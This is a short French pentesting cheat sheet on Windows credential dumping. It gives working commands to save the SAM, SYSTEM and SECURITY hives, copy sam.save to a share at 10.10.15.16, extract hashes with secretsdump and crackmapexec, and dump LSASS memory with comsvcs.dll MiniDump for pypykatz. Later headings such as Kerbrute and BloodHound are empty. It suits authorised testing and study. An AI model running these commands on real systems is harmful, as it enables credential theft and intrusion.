Enumération

SAM

hklm\sam
hklm\system
hklm\security

reg.exe save hklm\sam C:\sam.save
move sam.save \\10.10.15.16\CompData
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
crackmapexec smb <machine_ip> --local-auth -u user -p pass --sam
crackmapexec smb <machine_ip> --local-auth -u user -p pass --lsa

LSASS

# Recherche du PID
tasklist /svc
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
pypykatz lsa minidump /home/peter/Documents/lsass.dmp 

NTDS.dit

Recherche de credentials

Username

Informations

Kerbrute

Politique de mot de passe

Liste de nom d'utilisateurs

Pulvérisation de mot de passe

Linux

Windows

Module PowerShell ActiveDirectory

Powerview

SharpView

SharpHound / BloodHound

Remarque : ne pas oublier utilisateurs / mot de passe si besoin

Mis à jour